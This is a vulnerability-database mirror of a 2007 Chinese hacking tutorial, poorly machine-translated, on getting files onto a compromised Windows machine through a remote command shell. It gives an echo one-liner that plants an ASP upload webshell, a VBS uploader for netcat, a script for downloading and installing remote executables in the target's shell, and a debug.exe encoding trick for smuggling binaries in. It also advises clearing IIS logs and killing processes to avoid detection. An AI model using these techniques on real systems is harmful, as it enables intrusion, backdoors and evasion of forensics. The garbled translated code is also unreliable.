Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200715629
HistoryMay 28, 2007 - 12:00 a.m.

Cmd mode under the invasion of technology Encyclopedia of Cmd,mode,intrusion,technical-vulnerability warning-the black bar safety net

2007-05-2800:00:00
佚名
www.myhack58.com
26
JSON

Foreword
Cmd Shell(command line interaction)is a hack eternal topic. It is historic and enduring.
This article is intended to introduce and summarize some of the command line under control of the Windows System. These methods are as far as possible use the system comes with the tools to achieve.

File transfer
For overflow vulnerability to get the cmd shell. The biggest problem is how to upload a file. Since the worms the popular. Connection to the ipc$of the desired 1 3 9 or 4 4 5 port is routed blockade. Plus WinXP system to strengthen for the ipc$ of protection. Through ipc$and default share file upload means substantially ineffective. ftp and tftp are two possible methods. Between which has been well-known. This article is not presented. There are three familiar approaches. As a summary I’ll mention it:

  1. Use the Echo command to write the ASP Trojan.
    Provided of course that the target host is already installed on IIS.
    Generally the ASP Trojan"volume"is large. Not suitable for direct use of the echo command written to the file. Here I offer a small.
    Given directly to the echo:

@echo ^<%with the server. createobject(“adodb. stream”):. type=1:. open:. the write request. binaryread(request. totalbytes):. savetofile server. mappath(request. querystring(“s”)),2:end with%^> >up. asp

Note. There is only one line. No intervening carriage return.
Generation of up. asp can’t use a browser to access. Can only be used following thescript: the

with wscript
if . arguments. count<3 then . quit
url=. arguments(0)& amp;; amp; amp;“? s=”& amp;; amp; amp;. arguments(2)
fn=. arguments(1)
end with
with createobject(“adodb. stream”)
. type=1:. open:. loadfromfile fn:s=. read:. close
end with
with createobject(“microsoft. xmlhttp”)
. open “post”,url,false:. send s
wscript. echo . statustext
end with

Save it as up. vbs. Assuming that the target IP 1 2 3. 4 5. 6 7. 8 9. up. asp in the IIS virtual root directory. Need to upload the file to the nc. exe. After the upload is saved as mm. exe. The corresponding command is:

cscript up. vbs http://123.45.67.89/up.asp nc.exe mm.exe

Note. This command is in local command-line execution. Don’t get it wrong. In addition. Through the IIS upload will remain the log. Remember to clear Oh.

  1. Automatically downloaded to the web cache.
    For example: start its:http://www.sometips.com/soft/ps.exe

In the remote shell executing the above command. ps. exe has been downloaded to the target host page cache directory. Then:

cd “C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content. IE5”
dir /s ps[1]. exe

So get ps. exe a specific location(each host is different). Such as:

C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content. IE5\AB094JIT directory

2004-01-24 1 4:2 4 49,152 ps[1]. exe
1 File 49,152 bytes

Finally:
copy AB094JIT\ps[1]. exe c:\path\ps.exe
del AB094JIT\ps[1]. exe

Additional information:
In order for the service to start the way to the back door of the shell. Its user identity generally is a System. At this time the web cache directory location as shown in the example. If the shell’s identity is not a System. Need to modify the Default User for the corresponding user name.
This method will start an IE process. Remember to Will it to kill. If it is a System The identity of the shell. Not in local appears the window is exposed.
In addition. With ms-its instead its effect is exactly the same.

  1. Echo a script to download a web resource.
    Ready-made tool is iGet. vbs. I then give the one containing the necessary fault tolerance of the version.
    Is still echo version:

@echo with wscript:if . arguments. count^<2 then . quit:end if > dl. vbs
@echo set aso=. createobject(“adodb. stream”):set web=createobject(“microsoft. xmlhttp”) >> dl. vbs
@echo web. open “get”,. arguments(0),0:web. send:if web. status^>2 0 0 then . echo “Error:” web. status:. quit >> dl. vbs
@echo aso. type=1:aso. open:aso. write the web. responsebody:aso. savetofile . arguments(1),2:end with >> dl. vbs

Example-download ps. exe and save it to c:\the path under:

cscript dl. vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

Note. This is in the remote shell execution.

  1. Echo through the encoding of any file. Then use the script to debug restore.
    The previous two approaches are not guaranteed to pass through the firewall. And. Unless its own framethe Web server. General Web resources are in compressed file form. If the target host does not have a decompression tool. Or no choice. Then only the"killer".

the echo command emphasis orientation of the operator can be written in the ASCII code is less than 1 2 8 characters. But greater than or equal to 1 2 8 No. Only the local file re-encoding for the display character. Can be easily written to the remote host. First of all can think of is to base64 encoding. That email attachment encoding. But the vbs does not support bit operations. Therefore encoding and decoding more complex. More trouble is. The script to black. stream processing the file capacity is very poor. (ADODB. The Stream may be in stream mode to write the file. But I can’t construct the corresponding data type. Black bar data stream can use the midb function is converted into a string. But in turn no. I spent two days. Still could not solve this problem. If there is anyone who could use vbs or js write any byte data to a file. Kindly enlighten me.)

Helpless only please debug. exe to run. The principle many people know. I’m not introduced. Given directly to the outcome-encoded script:

fp=wscript. arguments(0)
fn=right(fp,len(fp)-instrrev(fp,“"))
with createobject(“adodb. stream”)
. type=1:. open:. loadfromfile fp:str=. read:sl=lenb(str)
end with
sll=sl mod 6 5 5 3 6:slh=sl\6 5 5 3 6
with createobject(“scripting. filesystemobject”). opentextfile(fp& amp;; amp; amp;”. bat",2,true)
. write “@echo str=”“”
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<1 6 then . write “0”
. write hex(bt)
if i mod 1 2 8=0 then . write “”“>>debug. vbs" vbcrlf “@echo “””
next
. writeline “”“>>debug. vbs” vbcrlf “@echo with wscript. stdout:r=vbcrlf”
“:for i=1 to len(str) step 4 of 8: The. write ““e”” hex(2 5 6 (i-1)/2)”_
“:for j=i to i 4 6 step 2:. write”” “” mid(str,j,2):next:. write r:next>>debug. vbs"
. writeline “@echo . write ““rbx”” r “”” hex(slh) “”" r ““rcx”” r “”" hex(sll)_
“”" r ““n debug. tmp”,” r ““w”” r ““q”” r:end with"_
“>>debug. vbs& amp;; amp; amp;& amp;; amp;amp; cscript //nologo debug. vbs|debug. exe>nul& amp;; amp; amp;& amp;; amp;amp; ren the debug. tmp “””& amp;; amp;amp; fn& amp;; amp; amp;“”“& amp;; amp;amp; del debug. vbs”
end with

Save it as echo. vbs. Suppose you want to upload nc. exe. Then in local command line, enter the command:

cscript echo. vbs nc.exe

Can also be directly put to transfer the file icon onto the script file icon.
Wait for a while. In the current directory will generate a nc. exe. bat. With Notepad and other editing tools to open it. You can see the following:

@echo str=“4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000”>>debug. vbs
@echo “504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000”>>debug. vbs
@echo “002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000”>>debug. vbs
@echo “70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100”>>debug. vbs

… (Omit the number of rows

@echo “”>>debug. vbs
@echo with wscript. stdout:r=vbcrlf:for i=1 to len(str) step 4 of 8: The. write “e” hex(2 5 6 (i-1)/2):for j=i to i 4 6 step 2:. write “” mid(str,j,2):next:. write r:next>>debug. vbs
@echo . write “rbx” r “0” r “rcx” r “E800” r “n debug. tmp,” r “w” r “q” r:end with>>debug. vbs& amp;; amp; amp;& amp;; amp;amp; cscript //nologo debug. vbs|debug. exe>nul& amp;; amp; amp;& amp;; amp;amp; ren the debug. tmp “NC.EXE”& amp;; amp;amp; del debug. vbs

Full - on copy - on switch to the remote command-line window - on paste.
If the network speed is not very slow. The entire upload process takes about 2 0 seconds.

Some points to note:

  1. Large file transfer is unstable. May cause the shell to die. So file the smaller the better. Recommends that the original file should not exceed 100KB.
  2. In the transmission of large files before. You can first transfer a small file as a"warm up". Let the 1 6-bit virtual machine ntvdm. exe resides in the background. All file transfer is finished. For concealment purposes. Should the ntvdm process to kill.
  3. Some of the cmd shell for each command are required to attach two carriage returns. That nc. exe. bat it can not be directly used.
    4. A single command length is limited. So you can not use only one echo to complete all tasks. And. For nc provided by the cmd shell. Slightly long some of the commands actually causes the shell to automatically exit the overflow?). You can modify the"i mod 1 2 8=0"statement in the 1 2 8 to adjust each echo command the length. Each time the echo character for this number is multiplied by 2.
  4. The decoding process is not the script involved is also possible. Use the script purpose is to reduce the amount of data transmitted as compressed data. If you have time. I’ll write a more perfect script. Enhanced Data compression capability. To increase the data check function.

Can upload files of course everything is well organized. But many operations use the Windows built-in Tool more convenient. In your looking around needs of the tool. Don’t forget Windows itself.

JSON